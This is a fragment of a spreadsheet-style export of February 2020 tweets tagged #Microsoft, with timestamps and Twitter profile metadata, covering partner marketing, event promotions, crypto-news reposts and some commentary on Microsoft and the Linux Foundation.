    <t>{'id': 785203170, 'id_str': '785203170', 'name': 'Siharde Oussama', 'screen_name': 'oussamasiharde', 'location': '', 'description': 'Software engineer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 552, 'listed_count': 0, 'created_at': 'Mon Aug 27 18:20:27 +0000 2012', 'favourites_count': 652, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 792,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'http://pbs.twimg.com/profile_images/913456261848604672/auAUo0hz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913456261848604672/auAUo0hz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/785203170/1488674898',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</si>
  <si>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10:04:18 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact AspiraCloud to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/RiVBi3VkQo</t>
  </si>
  <si>
    <t>Wed Feb 26 10:04:17 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact AspiraCloud to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/5vyDKR7NiA</t>
  </si>
  <si>
    <t>Wed Feb 26 10:03:55 +0000 2020</t>
  </si>
  <si>
    <t>The @linuxfoundation is how #microsoft views #linux https://t.co/VYSAra4PcK</t>
  </si>
  <si>
    <t>Wed Feb 26 10:01:33 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme https://t.co/HgxlkG6Uwg https://t.co/pEHIPE17CI</t>
  </si>
  <si>
    <t>{'id': 1019651380066254848, 'id_str': '1019651380066254848', 'name': 'RedHotBlock News', 'screen_name': 'rhbtoday', 'location': '', 'description': 'News aggregation portal for the latest in Bitcoin, Ethereum, Litecoin, popular crytocurrencies, Fintech, and the Blockchain.', 'url': 'https://t.co/UcHqBLQbII', 'entities': {'url': {'urls': [{'url': 'https://t.co/UcHqBLQbII', 'expanded_url': 'http://www.redhotblock.com', 'display_url': 'redhotblock.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 34, 'listed_count': 1, 'created_at': 'Wed Jul 18 18:33:28 +0000 2018', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5198,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'http://pbs.twimg.com/profile_images/1021434578001522688/6LZWRtCl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021434578001522688/6LZWRtCl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1019651380066254848/1532364214',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</si>
  <si>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10:01:16 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme
https://t.co/EbwD65xbE2
https://t.co/6oz6J2y3e9</t>
  </si>
  <si>
    <t>Wed Feb 26 09:59:03 +0000 2020</t>
  </si>
  <si>
    <t>Join our NICE and Microsoft compliance rock-stars for a forum dedicated to Cloud and Teams. Its your last chance to register  click here and find out more &amp;gt;&amp;gt; 
https://t.co/p4Ep63zNf5
#NICECompliance #NetworkwithNICE #MicrosoftTeams #Microsoft #CX #Finance #Compliance https://t.co/Lf6mzcBong</t>
  </si>
  <si>
    <t>{'id': 866570295662055424, 'id_str': '866570295662055424', 'name': 'Christine Burns', 'screen_name': 'CBurns1605', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Mon May 22 08:23:53 +0000 2017', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1146, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/866579531150307328/HXMOkZW6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/866579531150307328/HXMOkZW6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/866570295662055424/1498143973',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</si>
  <si>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09:55:03 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme
https://t.co/NdIk4qXIZH
https://t.co/4ShCGBj89Q</t>
  </si>
  <si>
    <t>{'id': 1185519987236188161, 'id_str': '1185519987236188161', 'name': 'CN ðŸš€ðŸ“«ðŸ’¡', 'screen_name': '_cryptoNole', 'location': 'Stoke-on-Trent, England', 'description': 'Crypto investor, miner, HODLer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4219, 'friends_count': 4431, 'listed_count': 4, 'created_at': 'Sat Oct 19 11:36:14 +0000 2019', 'favourites_count': 1492, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9336, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195827523042590720/PKHTfkkb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195827523042590720/PKHTfkkb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1185519987236188161/1573942476',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</si>
  <si>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09:54:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Search in Practice - this session at @SPConf with Agnes @molnaragnes will detail the updates and provide insight into how your organization can take advantage of the new #features and #experiences.
https://t.co/NjqYUyX8as
use the discount code: MOLNAR
#SPC20 #search https://t.co/wpKwHbrmIy</t>
  </si>
  <si>
    <t>{'id': 2415555361, 'id_str': '2415555361', 'name': 'Search Explained', 'screen_name': 'SearchExplained', 'location': 'Global (based in Hungary)', 'description': 'Microsoft Search in Office 365 &amp; SharePoint. Content Services, Knowledge Management, Digital Workspace. Training, consulting &amp; mentoring.', 'url': 'https://t.co/NGx6IF4aia', 'entities': {'url': {'urls': [{'url': 'https://t.co/NGx6IF4aia', 'expanded_url': 'https://SearchExplained.com', 'display_url': 'SearchExplained.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 647, 'friends_count': 233, 'listed_count': 114, 'created_at': 'Fri Mar 28 07:32:40 +0000 2014', 'favourites_count': 3143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4567,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'http://pbs.twimg.com/profile_images/890933500295221248/6LYxtavV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/890933500295221248/6LYxtavV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2415555361/1568115365', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Wed Feb 26 09:54:00 +0000 2020</t>
  </si>
  <si>
    <t>@eXtreme_365 is Dynamic Communities established partner &amp;amp; customer conference for Microsoft Dynamics F&amp;amp;O, CE, GP and the Power Platform. 
Join @BigEdGrant CFO of Solgari in his session *Biz Apps ISV Connect Program  Anything is Possible* 
#eXtreme365 #Microsoft #Solgari #ISV https://t.co/jQ1jlJEmwI</t>
  </si>
  <si>
    <t>Wed Feb 26 09:53:08 +0000 2020</t>
  </si>
  <si>
    <t>Energy Will Be PULLED From Your SCREEN??? Into You When You WATCH THIS Entertaining Vlog!!!!!  #entertainment #lifestyle #Youtube #Motivation #cool #fast #Rush #Google #beautiful #awesome #dolar #model #mindfullness #Microsoft #vlog #you #quick https://t.co/QIjBBluTuF https://t.co/HqNygIG6GF</t>
  </si>
  <si>
    <t>{'id': 1222612937430511617, 'id_str': '1222612937430511617', 'name': 'John', 'screen_name': 'John95183905', 'location': '', 'description': 'Youtuber, Salesman', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Wed Jan 29 20:10:25 +0000 2020', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 157, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222613297792458754/9J6sQp_v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222613297792458754/9J6sQp_v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1222612937430511617/1580467136',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</si>
  <si>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09:51:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows XP Home Edition Version 2002 CD Gateway New!!  #2002 #Edition #Gateway #Home #Microsoft #New  #Version #Windows https://t.co/N7wj9r1T5n</t>
  </si>
  <si>
    <t>Wed Feb 26 09:50:04 +0000 2020</t>
  </si>
  <si>
    <t>Proud to be working with great partners and always happy to support their events such as #MSIoTinAction in Nuremberg this week. 
#Microsoft #MSIoTinAction #crateDB #crateio #partnerships https://t.co/mCrzY8tJhQ</t>
  </si>
  <si>
    <t>{'id': 1381407714, 'id_str': '1381407714', 'name': 'Crate.io', 'screen_name': 'crateio', 'location': 'Austria, Berlin, San Francisco', 'description': 'Creators of CrateDB: a distributed SQL database that makes it simple to store and analyze massive amounts of machine data in real-time.', 'url': 'https://t.co/HeLXn0B7Z5', 'entities': {'url': {'urls': [{'url': 'https://t.co/HeLXn0B7Z5', 'expanded_url': 'https://crate.io', 'display_url': 'crate.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4780, 'friends_count': 1192, 'listed_count': 146, 'created_at': 'Fri Apr 26 08:44:26 +0000 2013', 'favourites_count': 700, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2014, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D0C7BD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/573806579419500544/Lqjn2pxo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/573806579419500544/Lqjn2pxo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1381407714/1424957413', 'profile_link_color': '423730',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</si>
  <si>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Wed Feb 26 09:47:11 +0000 2020</t>
  </si>
  <si>
    <t>Infrastructure + Security: Noteworthy News (February, 2020) https://t.co/MOwjRvg3DF #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 09:47:09 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/PPnb4a5jNI</t>
  </si>
  <si>
    <t>Wed Feb 26 09:46:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft in discussions with Germans on #Gaia-X participation. The company could be contracted as a supplier for the ambitious European #Cloud network infrastructure initiative | Euractiv 
https://t.co/u5dD6k0hz0</t>
  </si>
  <si>
    <t>{'id': 1060264448, 'id_str': '1060264448', 'name': 'PubAffairs EU News &amp; Debates ðŸ‡ªðŸ‡º', 'screen_name': 'PubAffairsEU', 'location': 'Brussels, Belgium', 'description': '@PubAffairsEU brings together every dimension of the #EU policy-making process. #EUNews, Debates &amp; Opinions on EU-related cutting-edge issues', 'url': 'https://t.co/ZcsaQGv7xB', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZcsaQGv7xB', 'expanded_url': 'http://www.pubaffairsbruxelles.eu/', 'display_url': 'pubaffairsbruxelles.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18534, 'friends_count': 15955, 'listed_count': 449, 'created_at': 'Fri Jan 04 11:52:25 +0000 2013', 'favourites_count': 11379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21136, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9DA2A3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/846712359800459264/hJmbHeg4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/846712359800459264/hJmbHeg4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1060264448/1580467023', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 09:44:48 +0000 2020</t>
  </si>
  <si>
    <t>A lot of bogus 'journalists' in  #corporatemedia want us to think that Open Source isn't "success" until #microsoft says so (having derailed to control it)</t>
  </si>
  <si>
    <t>Wed Feb 26 09:42:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Apple have been business partners and tough competitors for many years. Back in the seventies, Steve Jobs and Bill Gates worked close together. In 1997 the Windows-manufacturer helped Steve Jobs saving Apple.
#Apple #Microsoft #SteveJobs #BillGates #DidYouKnow https://t.co/avlrTsPvVh</t>
  </si>
  <si>
    <t>{'id': 817050271100637186, 'id_str': '817050271100637186', 'name': 'Gita Azad', 'screen_name': 'GitaAzad', 'location': 'Chandigarh, India', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Thu Jan 05 16:48:59 +0000 2017', 'favourites_count': 495, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 322, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231078687979769858/_N_c0Eps_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231078687979769858/_N_c0Eps_normal.jpg',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</si>
  <si>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09:41:37 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 09:41:30 +0000 2020</t>
  </si>
  <si>
    <t>Hosting Controller provides a comprehensive automation control panel for Microsoft Exchange Server 2019, 2016 and 2013 
Request Quote https://t.co/dKdiMtAlLY 
#Microsoft #Cloud #hostedsolution #microsoftexchange
#itsolutions #VMware #Hosting</t>
  </si>
  <si>
    <t>{'id': 86377430, 'id_str': '86377430', 'name': 'Hosting Controller', 'screen_name': 'hostcontroller', 'location': 'Canada', 'description': 'Founded in 1999,Hosting Controller is a cloud hosting automation solution for automatic provisioning of MS Exchange, SharePoint, Skype4Business &amp; Virtualization', 'url': 'http://t.co/8J1yCnOjwo', 'entities': {'url': {'urls': [{'url': 'http://t.co/8J1yCnOjwo', 'expanded_url': 'http://hostingcontroller.com', 'display_url': 'hostingcontroller.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 34, 'listed_count': 6, 'created_at': 'Fri Oct 30 19:15:14 +0000 2009', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 112, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/993792683364757504/5E5zK8Qk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/993792683364757504/5E5zK8Qk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86377430/1497304659', 'profile_link_color': '19CF86',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</si>
  <si>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Wed Feb 26 09:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme https://t.co/IlvJc9ILqo #Bitcoin #Fraud #Government #Microsoft https://t.co/xvoBCCbuYv</t>
  </si>
  <si>
    <t>{'id': 288638912, 'id_str': '288638912', 'name': 'à¸¿ittrail', 'screen_name': '___CryptoNews', 'location': 'United Arab Emirates', 'description': 'Crypto news as it happens. #bitcoin #crypto #blockchain #decentralized #cryptotrader', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2166, 'friends_count': 2165, 'listed_count': 82, 'created_at': 'Wed Apr 27 06:25:55 +0000 2011', 'favourites_count': 280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 266492,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'http://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/288638912/1582839789', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'F5F3DC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 09:40:02 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme https://t.co/d13w5FspTg #Bitcoin #Crimes #Microsoft #Government #UnitedStates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</si>
  <si>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8204, 'friends_count': 8945, 'listed_count': 38, 'created_at': 'Tue Nov 06 20:50:01 +0000 2018', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139714,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</si>
  <si>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09:39:47 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme #Bitcoin #Fraud #Government #Microsoft #UnitedStates #Court #Crimes #Regulation https://t.co/Me1pfnN4Fu</t>
  </si>
  <si>
    <t>Wed Feb 26 09:39:33 +0000 2020</t>
  </si>
  <si>
    <t>#Bitcoin #Crimes #Microsoft #Government #UnitedStates Ex-Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme https://t.co/hW1I8P3Tey https://t.co/Sd4Opf8rwN</t>
  </si>
  <si>
    <t>Wed Feb 26 09:34:36 +0000 2020</t>
  </si>
  <si>
    <t>Innovation is empathy turned into action, says @Microsoft CEO @SatyaNadella. Read more at https://t.co/pKxFWUD6Ks
#SatyaNadella #Microsoft #YoungInnovatorsSummit #Technology #Education https://t.co/Y8Y9bK4B4n</t>
  </si>
  <si>
    <t>Wed Feb 26 09:34:25 +0000 2020</t>
  </si>
  <si>
    <t>AZ-204T00-A - Developing Solutions for Microsoft Azure labs have now been released on the go deploy platform.
#labs #handsonlearning #onlinelabs #Microsoft #Azure https://t.co/2f6vTMzFrW</t>
  </si>
  <si>
    <t>{'id': 824909564109848576, 'id_str': '824909564109848576', 'name': 'go deploy', 'screen_name': 'godeployit', 'location': 'United Kingdom', 'description': 'Hosted IT Labs.  Unparalleled performance based on Solid State storage infrastructure hosted in 3 worldwide data centers.', 'url': 'https://t.co/gulILC31Zx', 'entities': {'url': {'urls': [{'url': 'https://t.co/gulILC31Zx', 'expanded_url': 'http://www.godeploy.it', 'display_url': 'godeploy.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Fri Jan 27 09:19:00 +0000 2017', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1179333159252574210/A1ONNAro_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179333159252574210/A1ONNAro_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/824909564109848576/1562584142', 'profile_link_color': '0874AA',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</si>
  <si>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09:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Drive #Innovation across your organisation by enabling every team to quickly build low code apps with #Microsoft power apps.
Join us 11th of March for our #PowerApps bootcamp where you will learn everything you need to know about the Microsoft tool.
https://t.co/qCzlSyU7fB https://t.co/3h3wEE6ywJ</t>
  </si>
  <si>
    <t>{'id': 462748162, 'id_str': '462748162', 'name': 'Spanish Point Tech', 'screen_name': 'Spanish_Point', 'location': 'Dublin, Ireland', 'description': 'Spanish Point is a Certified Gold Microsoft Partner which provides innovative business solutions &amp;  is Microsoft Country Partner of the Year 2019 for Ireland', 'url': 'http://t.co/LMm8BERhHl', 'entities': {'url': {'urls': [{'url': 'http://t.co/LMm8BERhHl', 'expanded_url': 'http://www.spanishpoint.ie', 'display_url': 'spanishpoint.ie', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 661, 'friends_count': 1881, 'listed_count': 35, 'created_at': 'Fri Jan 13 09:23:58 +0000 2012', 'favourites_count': 422, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1336,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'http://pbs.twimg.com/profile_images/1149348298358231043/i4PfHAJ4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149348298358231043/i4PfHAJ4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/462748162/1562861318',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</si>
  <si>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09:30:01 +0000 2020</t>
  </si>
  <si>
    <t>To see Power Query in action, take a look at our latest blog at: https://t.co/ITvWwS4pY9
Need technical support in Power Query? Connect with our experts: https://t.co/aaG7VXQTS4
#Loginworks #PowerQuery #PowerBI #Microsoft #Excel #BigData #DataAnalysis #WebScraping #DataScraping https://t.co/lYAjsQ86XI</t>
  </si>
  <si>
    <t>Wed Feb 26 09:23:38 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/TmBTQ18YCi #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/SKVc83Oxug</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</si>
  <si>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</si>
  <si>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09:22:41 +0000 2020</t>
  </si>
  <si>
    <t>"It is predicted that by 2030, there will be a $4 trillion opportunity focused on new mobility services, as the automotive and transportation sectors converge". #Microsoft initiatives. https://t.co/6RolrErKj1 #SmartMobility #Automotive</t>
  </si>
  <si>
    <t>{'id': 130806148, 'id_str': '130806148', 'name': 'Patrice Le Foll', 'screen_name': 'crm_plf', 'location': 'France', 'description': '@orangebusiness Digital eXperience team member | #Digital #CRM #CX #BigData #IoT #AI #Robotics #platform, #strategy... |  Opinions are my own (if any)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3704, 'friends_count': 3996, 'listed_count': 1692, 'created_at': 'Thu Apr 08 11:08:30 +0000 2010', 'favourites_count': 24761, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40987,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'http://pbs.twimg.com/profile_images/554403226498654208/VGgdBF3h_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/554403226498654208/VGgdBF3h_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/130806148/1481906118',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</si>
  <si>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Wed Feb 26 09:22:04 +0000 2020</t>
  </si>
  <si>
    <t>Recent reports show that 45% of all hospital devices connected to Microsoft Windows in the US are vulnerable to attack 
Learn more: https://t.co/FqiF0CIQ7B
#Cybersecurity #Microsoft #Windows https://t.co/yKvWnpMhfh</t>
  </si>
  <si>
    <t>{'id': 912828055, 'id_str': '912828055', 'name': 'Advantex', 'screen_name': 'advantexuk', 'location': 'North East England', 'description': 'Technology Solutions for Your Business', 'url': 'http://t.co/fJKERG2Jwa', 'entities': {'url': {'urls': [{'url': 'http://t.co/fJKERG2Jwa', 'expanded_url': 'http://www.advantex.uk.com/', 'display_url': 'advantex.uk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 578, 'friends_count': 714, 'listed_count': 8, 'created_at': 'Mon Oct 29 16:56:11 +0000 2012', 'favourites_count': 879, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2002,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'http://pbs.twimg.com/profile_images/1212658104825008128/pADSqzHl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212658104825008128/pADSqzHl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/912828055/1553847933', 'profile_link_color': '25B4B0',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</si>
  <si>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09:20:25 +0000 2020</t>
  </si>
  <si>
    <t>Did you know you can embed an Office 365 document on a website or blog? Find out the procedures to achieve such objectives here &amp;gt;&amp;gt; https://t.co/98sFFZNODz
#world #WednesdayThoughts #Microsoft #bloggerswanted #blogging #Website https://t.co/m6mgTY5NDy</t>
  </si>
  <si>
    <t>{'id': 1008865352506331136, 'id_str': '1008865352506331136', 'name': 'webMogul', 'screen_name': 'Rescreativity', 'location': 'Ontario, Canada', 'description': "I'm a curated content writer and experienced website developer.On a deeper level, I help individuals and brands to innovate through in-depth data analysis.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 396, 'listed_count': 0, 'created_at': 'Tue Jun 19 00:13:38 +0000 2018', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 238, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232956121658404866/UgOmpwFA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232956121658404866/UgOmpwFA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1008865352506331136/1565958728',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</si>
  <si>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09:19:46 +0000 2020</t>
  </si>
  <si>
    <t>#Love or #Hate Windows 10 tiles on the start menu? It may being removed by #microsoft. Find out more https://t.co/2ChnMjiNw3</t>
  </si>
  <si>
    <t>{'id': 1081572996148576258, 'id_str': '1081572996148576258', 'name': '39D - Taking the D out of technology Drama', 'screen_name': 'WeAre39D', 'location': 'North Weald, East', 'description': '39D Delivering 3 Core Services Backed By Our 9 Core Beliefs - Call us today 01992 249 249', 'url': 'https://t.co/HdF4TCrRw2', 'entities': {'url': {'urls': [{'url': 'https://t.co/HdF4TCrRw2', 'expanded_url': 'https://39it.co.uk', 'display_url': '39it.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 985, 'friends_count': 1549, 'listed_count': 2, 'created_at': 'Sat Jan 05 15:27:51 +0000 2019', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 642, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1081573144417189888/_uj3z8TH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081573144417189888/_uj3z8TH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1081572996148576258/1571822549',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</si>
  <si>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09:18:36 +0000 2020</t>
  </si>
  <si>
    <t>Reminder: At @LinuxFoundation in 2020 Three Board Members, Including the Vice Chair and Director at Large, Are Current or Past #Microsoft Employees https://t.co/VYSAra4PcK https://t.co/DIm1aYarjT</t>
  </si>
  <si>
    <t>Wed Feb 26 09:17:47 +0000 2020</t>
  </si>
  <si>
    <t>"For example, Black Duck, WhiteSource, and FOSSA are well-known vendors that offer scanning tools on a subscription basis." #linuxfoundation promotes #proprietarysoftware of #microsoft proxies, along with FUD, to make binary blob+surveillance sales https://t.co/ERoVneNL5u</t>
  </si>
  <si>
    <t>Wed Feb 26 09:15:02 +0000 2020</t>
  </si>
  <si>
    <t>We are delighted to announce that Amy Hood, currently CFO of #Microsoft will be joining #GCTS. Amy is one of Forbes Worlds #100MostPowerfulWomen. Find out more about her and our other confirmed speakers at https://t.co/nNAUWcNAVr https://t.co/qUmKlK4cnr</t>
  </si>
  <si>
